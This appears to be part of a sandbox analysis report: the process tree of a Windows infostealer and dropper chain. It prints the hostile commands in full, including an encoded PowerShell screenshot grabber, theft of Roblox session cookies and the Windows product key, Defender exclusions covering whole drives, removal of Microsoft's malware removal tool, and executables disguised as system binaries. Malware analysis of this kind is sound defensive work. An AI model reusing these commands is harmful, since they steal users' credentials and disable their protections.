                                                                                                                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                    6⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:940
                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ex2cw5ak\ex2cw5ak.cmdline"
                                                                                                                      7⤵
                                                                                                                        PID:6012
                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF992.tmp" "c:\Users\Admin\AppData\Local\Temp\ex2cw5ak\CSCA26C147CECAF49608CAA4E2FD4802515.TMP"
                                                                                                                          8⤵
                                                                                                                            PID:5152
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                      5⤵
                                                                                                                        PID:5304
                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                          tree /A /F
                                                                                                                          6⤵
                                                                                                                            PID:5692
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                          5⤵
                                                                                                                            PID:5580
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                              6⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:5716
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                            5⤵
                                                                                                                              PID:5756
                                                                                                                              • C:\Windows\system32\tree.com
                                                                                                                                tree /A /F
                                                                                                                                6⤵
                                                                                                                                  PID:5956
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                5⤵
                                                                                                                                  PID:6072
                                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                                    tree /A /F
                                                                                                                                    6⤵
                                                                                                                                      PID:5140
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                    5⤵
                                                                                                                                      PID:5196
                                                                                                                                      • C:\Windows\system32\tree.com
                                                                                                                                        tree /A /F
                                                                                                                                        6⤵
                                                                                                                                          PID:5176
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                        5⤵
                                                                                                                                          PID:4884
                                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                                            tree /A /F
                                                                                                                                            6⤵
                                                                                                                                              PID:2256
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                            5⤵
                                                                                                                                              PID:1216
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                6⤵
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:5328
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                              5⤵
                                                                                                                                                PID:2332
                                                                                                                                                • C:\Windows\system32\getmac.exe
                                                                                                                                                  getmac
                                                                                                                                                  6⤵
                                                                                                                                                    PID:4352
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI5642\rar.exe a -r -hp"1331" "C:\Users\Admin\AppData\Local\Temp\cB3gI.zip" *"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:3560
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI5642\rar.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI5642\rar.exe a -r -hp"1331" "C:\Users\Admin\AppData\Local\Temp\cB3gI.zip" *
                                                                                                                                                      6⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4904
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                    5⤵
                                                                                                                                                      PID:4872
                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                        wmic os get Caption
                                                                                                                                                        6⤵
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:5456
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                      5⤵
                                                                                                                                                        PID:5440
                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                          wmic computersystem get totalphysicalmemory
                                                                                                                                                          6⤵
                                                                                                                                                            PID:5500
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:2276
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              6⤵
                                                                                                                                                                PID:1960
                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                wmic csproduct get uuid
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:3344
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:3024
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:5312
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:5128
                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                      wmic path win32_VideoController get name
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Detects videocard installed
                                                                                                                                                                      PID:5840
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:5896
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        PID:2000
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\conhost.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:2148
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\phpjs\loweternal.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\phpjs\loweternal.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:4152
                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:2696
                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:2764
                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:3744
                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:2108
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\taskhostw.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\taskhostw.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Downloads MZ/PE file
                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:1736
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\dc.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\dc.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                          PID:5184
                                                                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reviewmonitor\I2NDCLAef0OekYkyyxGSvhVbS8a8zcEUiVo.vbe"
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            PID:5812
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Reviewmonitor\npTkUWH.bat" "
                                                                                                                                                                              6⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:5760
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Reviewmonitor\Comdriverbroker.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Reviewmonitor/Comdriverbroker.exe"
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                PID:3476
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:2436
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:5284
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:5292
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:4148
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:1708
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:856
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:4176
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:5268
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:1048
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:5800
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:5900
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UFQXBCBJZP.bat"
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:5584
                                                                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                                                                      chcp 65001
                                                                                                                                                                                      9⤵
                                                                                                                                                                                        PID:1608
                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                        ping -n 10 localhost
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                        PID:4884
                                                                                                                                                                                      • C:\Recovery\WindowsRE\dllhost.exe
                                                                                                                                                                                        "C:\Recovery\WindowsRE\dllhost.exe"
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:6104
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                                                                                                                          10⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          PID:2436
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                                                                                                                          10⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          PID:2360
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                                                                                                                          10⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          PID:6012
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                                                                                                                          10⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          PID:4152
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                                                                                                                          10⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          PID:2804
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                                                                                                                          10⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          PID:1348
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                                                                                                                          10⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          PID:3564
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                                                                                                                          10⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          PID:4156
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                                                                                                                          10⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          PID:4988
                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            11⤵
                                                                                                                                                                                              PID:5324
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                                                                                                                            10⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            PID:4288
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                                                                                                                            10⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            PID:552
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\StartMenuExperienceHost.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\StartMenuExperienceHost.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                PID:5940
                                                                                                                                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:5808
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:4200
                                                                                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:3800
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                      PID:4532
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                      PID:1380
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Power Settings
